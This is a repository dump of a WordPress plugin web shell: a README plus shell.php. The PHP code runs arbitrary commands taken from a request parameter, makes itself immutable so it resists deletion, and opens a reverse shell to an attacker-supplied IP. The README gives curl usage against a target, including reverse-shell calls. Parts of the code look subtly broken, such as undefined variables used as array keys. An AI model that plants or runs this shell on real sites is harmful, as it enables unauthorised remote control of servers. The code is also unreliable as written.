├── dist
    └── shell.zip
├── LICENSE
├── README.md
└── shell.php


/dist/shell.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leonjza/wordpress-shell/HEAD/dist/shell.zip


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2014 Leon Jacobs
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | wordpress-shell
 2 | ===============
 3 | 
 4 | Cheap & Nasty Wordpress Command Execution Shell.
 5 | 
 6 | Execute Commands as the webserver you are serving wordpress with!
 7 | Uploaded shell will probably be at <host>/wp-content/plugins/shell/shell.php
 8 | 
 9 | Install
10 | =======
11 | To install the shell, we are assuming you have administrative access to the Wordpress install and can install plugins.
12 | Either upload the zip file located in the `dist/` directory, or create your own archive with:
13 | 
14 | ```bash
15 | $ zip -r shell.zip shell.php
16 |   adding: shell.php (deflated 39%)
17 |   
18 | $ ls -lah shell.zip
19 | -rw-r--r--  1 bob  staff   492B Aug 29 14:17 shell.zip
20 | ```
21 | 
22 | Once uploaded, navigate to `/wp-content/plugins/shell/shell.php` and provide the `cmd` or `ip` as an argument.
23 | 
24 | Sample Usage
25 | ============
26 | 
27 | ```bash
28 | root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
29 | * About to connect() to 192.168.0.1 port 80 (#0)
30 | *   Trying 192.168.0.1...
31 | * connected
32 | * Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
33 | > GET /wp-content/plugins/shell/shell.php?cmd=uname+-a HTTP/1.1
34 | > User-Agent: curl/7.26.0
35 | > Host: 192.168.0.1
36 | > Accept: */*
37 | > 
38 | * additional stuff not fine transfer.c:1037: 0 0
39 | * HTTP 1.1 or later with persistent connection, pipelining supported
40 | < HTTP/1.1 200 OK
41 | < Date: Thu, 28 Aug 2014 09:28:24 GMT
42 | < Server: Apache/2.2.14 (Ubuntu)
43 | < X-Powered-By: PHP/5.3.2-1ubuntu4
44 | < Vary: Accept-Encoding
45 | < Content-Length: 191
46 | < Content-Type: text/html
47 | 
48 | Linux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
49 | ```
50 | 
51 | Reverse shell (default port:443)
52 | ============
53 | ```bash
54 | root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"192.168.1.101"})')"
55 | ```
56 | 
57 | ```bash
58 | root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"192.168.1.101","port":"1234"})')"
59 | ```
60 | 
61 | 
62 | 
63 | 


--------------------------------------------------------------------------------
/shell.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     /*
 3 |     Plugin Name: Cheap & Nasty Wordpress Shell
 4 |     Plugin URI: https://github.com/leonjza/wordpress-shell
 5 |     Description: Execute Commands as the webserver you are serving wordpress with! Shell will probably live at /wp-content/plugins/shell/shell.php. Commands can be given using the 'cmd' GET parameter. Eg: "http://192.168.0.1/wp-content/plugins/shell/shell.php?cmd=id", should provide you with output such as <code>uid=33(www-data) gid=verd33(www-data) groups=33(www-data)</code>
 6 |     Author: Leon Jacobs
 7 |     Version: 0.3
 8 |     Author URI: https://leonjza.github.io
 9 |     */
10 | 
11 | # attempt to protect myself from deletion
12 | $this_file = __FILE__;
13 | @system("chmod ugo-w $this_file");
14 | @system("chattr +i $this_file");
15 | 
16 | # Name of the parameter (GET or POST) for the command. Change this if the target already use this parameter.
17 | $cmd = 'cmd';
18 | 
19 | # test if parameter 'cmd', 'ip or 'port' is present. If not this will avoid an error on logs or on all pages if badly configured.
20 | if(isset($_REQUEST[$cmd])) {
21 | 
22 |     # grab the command we want to run from the 'cmd' GET or POST parameter (POST don't display the command on apache logs)
23 |     $command = $_REQUEST[$cmd];
24 |     executeCommand($command);
25 |     
26 | } else if(isset($_REQUEST[$ip]) && !isset($_REQUEST[$cmd])) {
27 | 
28 |     $ip = $_REQUEST[$ip];
29 |     
30 |     # default port 443
31 |     $port = '443';
32 |     
33 |     if(isset($_REQUEST[$ip])){
34 |         $port = $_REQUEST[$port];
35 |     }
36 |     
37 |     # nc -nlvp 443
38 |     $sock = fsockopen($ip,$port);
39 |     $command = '/bin/sh -i <&3 >&3 2>&3';
40 |     
41 |     executeCommand($command);
42 |         
43 | }
44 | 
45 | die();
46 | 
47 | function executeCommand(string $command) {
48 | 
49 |      # Try to find a way to run our command using various PHP internals
50 |     if (class_exists('ReflectionFunction')) {
51 | 
52 |        # http://php.net/manual/en/class.reflectionfunction.php
53 |        $function = new ReflectionFunction('system');
54 |        $function->invoke($command);
55 | 
56 |     } elseif (function_exists('call_user_func_array')) {
57 | 
58 |        # http://php.net/manual/en/function.call-user-func-array.php
59 |        call_user_func_array('system', array($command));
60 | 
61 |     } elseif (function_exists('call_user_func')) {
62 | 
63 |        # http://php.net/manual/en/function.call-user-func.php
64 |        call_user_func('system', $command);
65 |     
66 |     } else if(function_exists('passthru')) {
67 |         
68 |        # https://www.php.net/manual/en/function.passthru.php
69 |        ob_start();
70 |        passthru($command , $return_var);
71 |        $output = ob_get_contents();
72 |        ob_end_clean();
73 | 
74 |     } else if(function_exists('system')){
75 | 
76 |        # this is the last resort. chances are PHP Suhosin
77 |        # has system() on a blacklist anyways :>
78 | 
79 |        # http://php.net/manual/en/function.system.php
80 |        system($command);
81 |     }
82 | }
83 | 


--------------------------------------------------------------------------------